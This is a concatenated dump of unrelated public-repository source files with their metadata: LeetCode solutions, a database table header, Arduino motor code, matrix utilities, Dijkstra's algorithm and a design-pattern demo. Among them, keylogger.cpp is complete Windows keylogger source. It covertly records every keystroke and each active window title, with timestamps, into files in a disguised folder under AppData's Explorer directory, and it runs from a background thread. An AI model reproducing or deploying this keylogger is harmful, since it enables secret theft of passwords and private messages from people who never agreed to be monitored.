front_edge_to_center^2). * @return AO in the above figure, which is the maximum turn radius when the * vehicle turns with maximum steering angle */ static double MinSafeTurnRadius(); private: static VehicleParam vehicle_param_; static bool is_init_; DECLARE_SINGLETON(VehicleParamHandle); }; } #endif
f68978e94f9144d29e89e0cd59a1536b7bd32007
fa55d8ed32564195f2687d1e18b99f80c5683073
/spw/166/fraction_to_recurring_decimal.cc
15c4442d177cc4a04a59ffedbe16cca428dc36ab
[]
no_license
TenFifteen/SummerCamp
1841bf1bd212938cee818540658185cd3e429f0c
383b9321eee9e0721772f93a897c890f737f2eff
refs/heads/master
2020-04-05T23:48:01.393256
2018-03-11T12:37:38
2018-03-11T12:37:38
38,595,086
9
4
null
2016-07-18T14:21:15
2015-07-06T03:15:55
C++
UTF-8
C++
false
false
2,504
cc
fraction_to_recurring_decimal.cc
#include <cstdio> #include <string> #include <vector> #include <map> #include <utility> using namespace std; /** * Problem: Given two integers representing the numerator and denominator of a fraction, return the fraction in string format. * Solve: use a map to keep in mind where the loop begins. * Tips: 1. use long. * 2. handle sign * 3. the map can be map<int, int> ? think about it. * yes, we can use it, but in this way, we must see forward. that is, if r is not in the map, then we let * ans += (r*10/d), because the same r corresponding to the same r*10/d */ string fractionToDecimal(int numerator, int denominator) { int sign = 1; long nn = numerator, dd = denominator; if (numerator < 0) {sign = -sign, nn = -nn;} if (denominator < 0) {sign = -sign, dd = -dd;} long num = nn / dd; string ans = ""; while (num) { ans = (char)('0' + num % 10) + ans; num /= 10; } if (ans == "") ans = "0"; if (sign < 0 && nn != 0) ans = '-' + ans; long r = nn % dd; if (r == 0) return ans; map<pair<int,int>, int> remainder_index; string fra = ""; for (r *= 10; r != 0; r*= 10) { int n = r / dd; r = r % dd; if (r == 0) { fra += (char)(n + '0'); break; } else { pair<int, int> t(n, r); if (remainder_index.count(t) != 0) { ans = ans + "." + fra.substr(0, remainder_index[t]) + "(" + fra.substr(remainder_index[t]) + ")"; return ans; } remainder_index[t] = fra.size(); } fra += (char)(n + '0'); } return ans + "." + fra; } string fractionToDecimal1(long numerator, long denominator) { if (numerator == 0) return 0; if (denominator == 0) return "NaN"; int sign = 1; if (numerator < 0) {sign = -sign, numerator = -numerator;} if (denominator < 0) {sign = -sign, denominator = -denominator;} string ans = to_string(numerator/denominator); if (sign < 0) ans = '-' + ans; long r = numerator % denominator; if (r == 0) return ans; ans += "."; map<pair<int,int>, int> remainder_index; for (r *= 10; r != 0; r*= 10) { int n = r / denominator; r = r % denominator; if (r == 0) { ans += (char)(n + '0'); break; } else { pair<int, int> t(n, r); if (remainder_index.count(t) != 0) { ans.insert(remainder_index[t], "("); ans += ")"; break; } remainder_index[t] = ans.size(); } ans += (char)(n + '0'); } return ans; } int main() { int a, b; while (~scanf("%d %d", &a, &b)) { printf("%d/%d is %s\n", a, b, fractionToDecimal1(a, b).c_str()); } return 0; }
5f5de5b9bf5a16c80fa567f452ba979c3b587617
5d58277163dafd8a0d151bcd0fd091ecc6074fd2
/leetcode_335_self-crossing.cpp
73dc0de2e089f3e398cb711a2baa1307ca00a8a5
[]
no_license
lwl0810/leetcode
2278e20ae9ce44869ba72b521247aef466608a32
76a5698fdf086f1d68f86a064f84a6fa54de844f
refs/heads/master
2020-02-26T15:20:52.478104
2016-08-09T07:28:38
2016-08-09T07:28:38
60,558,781
0
0
null
null
null
null
UTF-8
C++
false
false
752
cpp
leetcode_335_self-crossing.cpp
//https://leetcode.com/problems/self-crossing/ class Solution { public: //time O(n), space O(1) bool isSelfCrossing(vector<int>& x) { int n = x.size(); if(n <= 3) return false; for(int i = 3; i < n; ++i){ //Fourth line crosses first line and onward(内交) if(x[i] >= x[i-2] && x[i-1] <= x[i-3]) return true; if(i >= 4){ // Fifth line meets first line and onward(重叠) if(x[i-1] == x[i-3] && x[i] + x[i-4] >= x[i-2]) return true; } if(i >= 5){ // Sixth line crosses first line and onward(外交) if(x[i-2] - x[i-4] >= 0 && x[i] >= x[i-2] - x[i-4] && x[i-1] >= x[i-3] - x[i-5] && x[i-1] <= x[i-3]) return true; } } return false; } };
3082df8d2c72a8b01c72ae37fb6108a7d80f37c4
582cd551e1466a6a49e68c65bb810fdcd34e32c0
/team28-db/Table.h
100de741ee14f0a9d6027deecab5f7fb1d6d519f
[]
no_license
mgyarmathy/team28-db
43c113402a5792cd3ad240f101daf12ee96ffa34
d12274a46306bd02ea9ef97eb6763d27570de2ab
refs/heads/master
2016-09-03T07:38:23.900230
2013-02-22T05:44:37
2013-02-22T05:47:13
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,610
h
Table.h
/* * Name : Table.h * Author : Team 28 * Description : - header file for Table class */ #ifndef TABLE_H_ #define TABLE_H_ #include <vector> #include <iostream> #include "Attribute.h" #include "Record.h" using namespace std; class __declspec(dllexport) Table { friend class Database; public: //constructors Table(); Table(vector<Attribute> fields); //column operations int addColumn(Attribute a); //throws ColumnAlreadyExistsException int deleteColumn(Attribute a); int deleteColumn(string attributeName); int renameColumn(string oldName, string newName); vector<Attribute> getColumns(); //row operations /*int insertRow(string values);*/ //how are we to implement this? below seems like a better implementation int insertRow(vector<string> values); //throws RowTooLargeException int getNumberOfRows(); Record& rowAt(int index); //key operations int setKey(vector<Attribute> attributes); int setKey(vector<string> attributes); vector<Attribute> getKeys(); //table join operations Table crossJoin(Table a, Table b); Table naturalJoin(Table a, Table b); //throws NoMatchingKeyException //table computation functions string sum(string column); string min(string column); string max(string column); int count(string column); private: bool columnExists(string name); int getKeyIndex(string name); int getColumnIndex(string name); vector<Attribute> columns; // stores the headers/titles vector<Record> rows; // stores all the data vector<bool> isKey; // tells if the particular attribute is a key }; #endif //TABLE_H_
ce6a920c5765f66b1945a1d54f871c6370d0ea76
cffc460605febc80e8bb7c417266bde1bd1988eb
/before2020/ZeroJudge/ZJ b030.cpp
bc750f40cdb344af7141785f800ca31504bfaa48
[]
no_license
m80126colin/Judge
f79b2077f2bf67a3b176d073fcdf68a8583d5a2c
56258ea977733e992b11f9e0cb74d630799ba274
refs/heads/master
2021-06-11T04:25:27.786735
2020-05-21T08:55:03
2020-05-21T08:55:03
19,424,030
7
4
null
null
null
null
UTF-8
C++
false
false
549
cpp
ZJ b030.cpp
#include <iostream> #include <string> using namespace std; int main() { bool ox_1,ox_2; int a[128],b[128],i; string n; while (getline(cin,n)) { ox_1=ox_2=1; for (i=127;i;i--) a[i]=b[i]=0; for (i=0;i<n.size();i++) a[n[i]]++; getline(cin,n); for (i=0;i<n.size();i++) b[n[i]]++; for (i=65;i<=90;i++) { if (a[i]!=b[i]) { ox_1=0; break; } } for (i=97;ox_1&&i<=122;i++) { if (a[i]!=b[i]) { ox_2=0; break; } } if (ox_1&&ox_2) cout<<"Yes"<<endl; else cout<<"No"<<endl; } }
9656453949c6bf05377d41437a554168c69923b9
1f4ab39e79ae39a371f8d9c36f72e8a60804128a
/stepper_motor_controller/Arduino/stepper_motor_controller/Node.cpp
ebe2ddd0352302ec53bcd5101d900eebcd44229c
[ "MIT" ]
permissive
sci-bots/stepper-motor-controller
fc35df7f4d905cfb1d8a45557942316f0a86553e
dda185cb63ee929bba1c755d21c90311b1b12d66
refs/heads/master
2020-07-15T09:33:22.622704
2016-11-17T18:57:04
2016-11-17T18:57:04
73,965,101
1
0
null
null
null
null
UTF-8
C++
false
false
1,421
cpp
Node.cpp
#include "Node.h" namespace stepper_motor_controller { uint16_t Node::steps_; bool Node::is_running_ = false; void Node::begin() { config_.set_buffer(get_buffer()); config_.validator_.set_node(*this); config_.reset(); config_.load(); state_.set_buffer(get_buffer()); state_.validator_.set_node(*this); // Start Serial after loading config to set baud rate. #if !defined(DISABLE_SERIAL) //Serial.begin(config_._.baud_rate); /* Hard code baud rate, since configurable baud rate may lead to trouble * connecting in the case where the baud rate is initialized to an undefined * value. */ Serial.begin(115200); #endif // #ifndef DISABLE_SERIAL // Set i2c clock-rate to 400kHz. TWBR = 12; pinMode(DIR_PIN, OUTPUT); pinMode(STEP_PIN, OUTPUT); pinMode(MS1_PIN, OUTPUT); pinMode(MS2_PIN, OUTPUT); pinMode(MS3_PIN, OUTPUT); Timer1.initialize(1000); // initialize timer1, and set a 1 ms period Timer1.stop(); // attach _timer_callback() as a timer overflow interrupt Timer1.attachInterrupt(_timer_callback); } void Node::set_i2c_address(uint8_t value) { // Validator expects `uint32_t` by reference. uint32_t address = value; /* Validate address and update the active `Wire` configuration if the * address is valid. */ config_.validator_.i2c_address_(address, config_._.i2c_address); config_._.i2c_address = address; } } // namespace stepper_motor_controller
065cfe612ba23d39de579b8c09e8807968f4476e
cc7eaa8b35c244c4f44837433313828eb1aaf115
/Swapping/Swapping/EntryPoint.cpp
a57b8d9b45e3b8c97706f8b33eeaa1289e50445d
[]
no_license
padoleshital/Procedure-Oriented-programming
95799c2c876461c738a272449cadbe64f01cf5b8
56e5a068fc5f76f99fc5ca4966a0f10a00384dbc
refs/heads/master
2020-05-24T04:20:03.554083
2019-12-30T13:30:41
2019-12-30T13:30:41
187,090,339
1
0
null
2019-12-30T13:30:43
2019-05-16T19:36:50
C
UTF-8
C++
false
false
416
cpp
EntryPoint.cpp
#include<stdio.h> //Write a program which accept two number from user swapping of that number without using third variable(temp) int main() { int x=0,y=0; printf("Enter value of x:"); scanf("%d",&x); printf("Enter value of y:"); scanf("%d",&y); if(x>=0 && y>=0) { x = x + y; y = x - y; x = x - y; } printf("After Swapping value of x: %d \n value of y: %d",x,y); return 0; }
a5c34a012c93125b6e0b299268cf2c3407d9c0dd
a434cac6cc0e6b79b7b982bafe6848b8c4436525
/MDK/keylogger.cpp
cf0e441afe727a7a12affdd62c7093edd97f3c70
[ "Apache-2.0" ]
permissive
waelbentaleb/mdk-windows-client
e9bfef0ab84c70cf9e75affa620198ce50252811
63172386b3e8f6653b9de5382767cf70a073bd56
refs/heads/master
2021-09-26T22:33:21.913907
2018-11-03T22:56:25
2018-11-03T22:56:25
156,027,989
2
0
null
null
null
null
WINDOWS-1252
C++
false
false
5,623
cpp
keylogger.cpp
#include "stdafx.h" #include "keylogger.h" using namespace std; Keylogger::Keylogger() { } Keylogger::~Keylogger() { } string Keylogger::getPath() { SYSTEMTIME st; GetSystemTime(&st); char tt[100]; sprintf_s(tt, "%.4d-%.2d-%.2d", st.wYear, st.wMonth, st.wDay); string path; char pa[260]; GetEnvironmentVariable("USERPROFILE", pa, 260); path = pa; path += "\\AppData\\Local\\Microsoft\\Windows\\Explorer\\temp\\"; CreateDirectory(path.c_str(), NULL); path += tt; path += ".txt"; return path; } void Keylogger::update_controle_keys() { Shift = AltGr = Ctrl = false; if ((GetKeyState(VK_LSHIFT) & 0x8000) != 0 || (GetKeyState(VK_RSHIFT) & 0x8000) != 0) Shift = true; else if ((GetKeyState(VK_RMENU) & 0x8000) != 0) // AltGr must be before Ctrl (Ctrl activation) AltGr = true; else if ((GetKeyState(VK_LCONTROL) & 0x8000) != 0 || (GetKeyState(VK_RCONTROL) & 0x8000) != 0) Ctrl = true; else if ((GetKeyState(VK_CAPITAL) & 0x8000) != 0) Capital = !Capital; return; } string Keylogger::key_to_char(int key) { // controle keys if (key == VK_BACK) return "[BS]"; if (key == VK_DELETE) return "[DEL]"; else if (key == VK_CLEAR) return "[CLEAR]"; else if (key == VK_RETURN) return "\n"; else if (key == VK_SPACE) return " "; else if (key == VK_LEFT) return "[LEFT]"; else if (key == VK_UP) return "[UP]"; else if (key == VK_RIGHT) return "[RIGHT]"; else if (key == VK_DOWN) return "[DOWN]"; // Numeric line else if (key >= 0x30 && key <= 0x39) { if (Shift) return string(1, char(key)); else if (key == 0x30) if (AltGr) return "@"; else return "à"; else if (key == 0x31) if (AltGr) return ""; else return "&"; else if (key == 0x32) if (AltGr) return "~"; else return "é"; else if (key == 0x33) if (AltGr) return "#"; else return "\""; else if (key == 0x34) if (AltGr) return "{"; else return "'"; else if (key == 0x35) if (AltGr) return "["; else return "("; else if (key == 0x36) if (AltGr) return "|"; else return "-"; else if (key == 0x37) if (AltGr) return "`"; else return "è"; else if (key == 0x38) if (AltGr) return "\\"; else return "_"; else if (key == 0x39) if (AltGr) return "^"; else return "ç"; } // Letters else if (key >= 0x41 && key <= 0x5a) if (Shift && !Capital || !Shift && Capital) return string(1, char(key)); // Upper case letters else return string(1, char(key + 32)); // Lower case letters // Numeric keypad else if (key == VK_NUMPAD0) return "0"; else if (key == VK_NUMPAD1) return "1"; else if (key == VK_NUMPAD2) return "2"; else if (key == VK_NUMPAD3) return "3"; else if (key == VK_NUMPAD4) return "4"; else if (key == VK_NUMPAD5) return "5"; else if (key == VK_NUMPAD6) return "6"; else if (key == VK_NUMPAD7) return "7"; else if (key == VK_NUMPAD8) return "8"; else if (key == VK_NUMPAD9) return "9"; else if (key == VK_MULTIPLY) return "*"; else if (key == VK_ADD) return "+"; else if (key == VK_DECIMAL) return "."; else if (key == VK_SUBTRACT) return "-"; else if (key == VK_DIVIDE) return "/"; else if (key == VK_OEM_1) if (Shift) return "£"; else return "$"; else if (key == VK_OEM_2) if (Shift) return "/"; else return ":"; else if (key == VK_OEM_3) if (Shift) return "%"; else return "ù"; else if (key == VK_OEM_4) if (Shift) return "°"; else if (AltGr) return "]"; else return ")"; else if (key == VK_OEM_5) if (Shift) return "µ"; else return "*"; else if (key == VK_OEM_6) if (Shift) return "¨"; else return "^"; else if (key == VK_OEM_7) return "²"; else if (key == VK_OEM_8) if (Shift) return "§"; else return "!"; else if (key == VK_OEM_COMMA) if (Shift) return "?"; else return ","; else if (key == VK_OEM_102) if (Shift) return ">"; else return "<"; else if (key == VK_OEM_PERIOD) if (Shift) return "."; else return ";"; else if (key == VK_OEM_PLUS) if (Shift) return "+"; else if (AltGr) return "}"; else return "="; else if (key == VK_OEM_CLEAR) if (Shift) return "?"; else return "clear"; else if (key == VK_OEM_MINUS) if (Shift) return "?"; else return "minus"; else return ""; } void Keylogger::log() { string path = getPath(); while (true) { Sleep(10); h_for = GetForegroundWindow(); // Get active window hwnd if (h_org != h_for) { h_org = h_for; // set active window char name[260]; GetWindowText(h_org, name, 260); // get window name tm = name; // windows name if (tm != "") { SYSTEMTIME st; GetSystemTime(&st); // get time char tt[100]; sprintf_s(tt, "%.4d-%.2d-%.2d %.2d:%.2d:%.2d", st.wYear, st.wMonth, st.wDay, st.wHour + 1, st.wMinute, st.wSecond); tm += " | "; tm += tt; // time tm += "\n"; tm = "\n\n" + tm; LogFile.open(path, fstream::app); LogFile << tm.c_str(); LogFile.close(); } } for (int KEY = 0; KEY <= 255; KEY++) { if (GetAsyncKeyState(KEY) == -32767) { update_controle_keys(); ch = key_to_char(KEY); LogFile.open(path, fstream::app); LogFile << ch.c_str(); LogFile.close(); } } } } DWORD WINAPI Keylogger::startLogging(PVOID instance) { ((Keylogger*)instance)->log(); return 0; } HANDLE Keylogger::startThread() { return (HANDLE) CreateThread(0, 0, startLogging, this, 0, 0); }
53434ba3d6f7e754f3c26fd2fb35e4d8eb385769
185b7537e2b1f6bca6783c176a3546b73bccf180
/1.0/Matrix.cpp
f1c7d64871064017b80a441c3def1f2ccd2bd654
[]
no_license
simoncai519/Makowitz-Portfolio-Optimization
72b96031c6c9655240dd1cb048739ddc9a73cf79
1e419de2ba86d17c09fafae4305ed738ace21d52
refs/heads/master
2022-10-20T07:06:53.500210
2020-06-08T14:39:07
2020-06-08T14:39:07
270,701,491
1
0
null
null
null
null
UTF-8
C++
false
false
1,564
cpp
Matrix.cpp
#include "Matrix.h" #include <cmath> Vector operator*(const Matrix& C,const Vector& V) { int d = C.size(); int f = V.size(); Vector W(d); for (int j=0; j<d; j++) { W[j]=0.0; for (int l=0; l<f; l++) W[j]=W[j]+C[j][l]*V[l]; } return W; } Vector operator*(const Vector& V, const Matrix& C) { int d = C.size(); int f = C[0].size(); Vector W(f); for (int j=0; j<f; j++) { W[j]=0.0; for (int l=0; l<d; l++) W[j]=W[j]+C[l][j]*V[l]; } return W; } Vector operator+(const Vector& V,const Vector& W) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = V[j] + W[j]; return U; } Vector operator-(const Vector& V,const Vector& W) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = V[j] - W[j]; return U; } Vector operator+(const double& a,const Vector& V) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = a + V[j]; return U; } Vector operator*(const double& a,const Vector& V) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = a*V[j]; return U; } Vector operator*(const Vector& V,const Vector& W) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = V[j] * W[j]; return U; } Vector exp(const Vector& V) { int d = V.size(); Vector U(d); for (int j=0; j<d; j++) U[j] = exp(V[j]); return U; } double operator^(const Vector& V,const Vector& W) { double sum = 0.0; int d = V.size(); for (int j=0; j<d; j++) sum = sum + V[j]*W[j]; return sum; }
04f5fcc55d777b900665e5414d6bdffcadbaab66
21b237d21900049538179bf2bdc8a72e3541ab21
/Recursion/SumOfDigits.cpp
efd9992b523a0b3d105ce3f6debe69059767bcd8
[ "MIT" ]
permissive
SagarMedtiya/DSA-in-c-plus-plus
ed7d84ba6b4f534e5f0831288a08f80366b40782
eae528d97bdbbb2d3e5ecd3e91be346503d0c8af
refs/heads/main
2023-06-27T01:27:48.377725
2021-07-29T18:48:16
2021-07-29T18:48:16
382,650,712
1
1
null
null
null
null
UTF-8
C++
false
false
187
cpp
SumOfDigits.cpp
#include<bits/stdc++.h> using namespace std; int sum(int n, int k=0){ if(n==0){ return k; } return (sum(n/10,k+(n%10))); } int main(){ int n; cin>>n; cout<<sum(n); return 0; }
0e274df6b00855a8cbd166f9ceb456496ad3e819
f1299d270308de0942aa5c888b4a167937ca82f9
/graph/dijkastra.cpp
6482edffdb927318f6a019a230a1064c68a2837b
[]
no_license
marait123/cses-problemset
37374580beefcc2435862a445f0660914fbc761c
d950bcb05fbf422cfffd747d1b98b7ca15af49c4
refs/heads/main
2023-06-21T03:36:30.928407
2021-07-22T19:06:13
2021-07-22T19:06:13
344,192,548
0
0
null
null
null
null
UTF-8
C++
false
false
2,174
cpp
dijkastra.cpp
#include <iostream> #include <vector> #include <algorithm> #include <string.h> #include <math.h> #include <queue> #include <map> using namespace std; #define MAX_N 100000 #define LL long long #define OO INT32_MAX void dikastra(vector<vector<pair<int, int>>> &adj, vector<int> &parents) { vector<int> distances(adj.size(), OO); vector<bool> processed(adj.size(), false); priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq_distance_node; distances[0] = 0; // insert node 0 with distance 0 pq_distance_node.push(pair<int, int>(0, 0)); while (!pq_distance_node.empty()) { pair<int, int> node = pq_distance_node.top(); pq_distance_node.pop(); if (processed[node.second]) { continue; } processed[node.second] = true; int w = node.first, a = node.second; // relax for (auto adj_node : adj[a]) { if (w + adj_node.first < distances[adj_node.second]) { distances[adj_node.second] = w + adj_node.first; parents[adj_node.second] = a; pq_distance_node.push(pair<int, int>(distances[adj_node.second], adj_node.second)); // insert the node second and its weight } } } } void print_parents(int current_node, vector<int> parents) { if (current_node == -1) { return; } else { print_parents(parents[current_node], parents); cout << current_node + 1 << " "; } } int main() { freopen("case1.txt", "r", stdin); int n, m; cin >> n; cin >> m; vector<vector<pair<int, int>>> adj(n, vector<pair<int, int>>()); vector<int> parents(n, -1); for (size_t i = 0; i < m; i++) { int a, b, w; cin >> a >> b >> w; adj[a - 1].push_back(pair<int, int>(w, b - 1)); } dikastra(adj, parents); if (parents[parents.size() - 1] == -1) { cout << -1 << endl; } else { int current_node = parents.size() - 1; print_parents(current_node, parents); cout << endl; } return 0; }
cf41fffb76d5d3e2f415807f35392777e8b69dee
dc1e7eacf8f901f7a7de5876c725bba4ef16593c
/LAB_1_Prototype.cpp
4e318aa6f5a1217cbf5be635ee658d9a5871ef3d
[]
no_license
Black4White/Lab_1_TMPS
00583facf86662dc350e9cff53f3bd5a956d7dd1
ab30fc24e7c8604108533be9ac4ac4017117b310
refs/heads/master
2022-06-22T21:31:54.848874
2020-05-09T16:38:05
2020-05-09T16:38:05
262,595,972
0
0
null
null
null
null
UTF-8
C++
false
false
1,332
cpp
LAB_1_Prototype.cpp
#include <iostream> #include <string> using namespace std; /* Prototype base class. */ class Aircraft //Prototype { protected: string value; public: virtual Aircraft* clone() = 0; string getValue() { return value; } }; class ConcreteAircraft : public Aircraft //ConcretePrototype { public: ConcreteAircraft(string color) { value = color; } Aircraft* clone() { return new ConcreteAircraft(*this); } }; /* Factory that manages prorotype instances and produces their clones. */ class Factory { static Aircraft* copy1; static Aircraft* copy2; public: static void initialize() { copy1 = new ConcreteAircraft("red"); copy2 = new ConcreteAircraft("green"); } static Aircraft* getAircraftRed() { return copy1->clone(); } static Aircraft* getAircraftGreen() { return copy2->clone(); } }; Aircraft* Factory::copy1 = 0; Aircraft* Factory::copy2 = 0; int main() { Factory::initialize(); Aircraft* object; /* All the object were created by cloning the prototypes. */ object = Factory::getAircraftRed(); //red cout << object->getValue() << endl; object = Factory::getAircraftGreen(); //green cout << object->getValue() << endl; return 0; }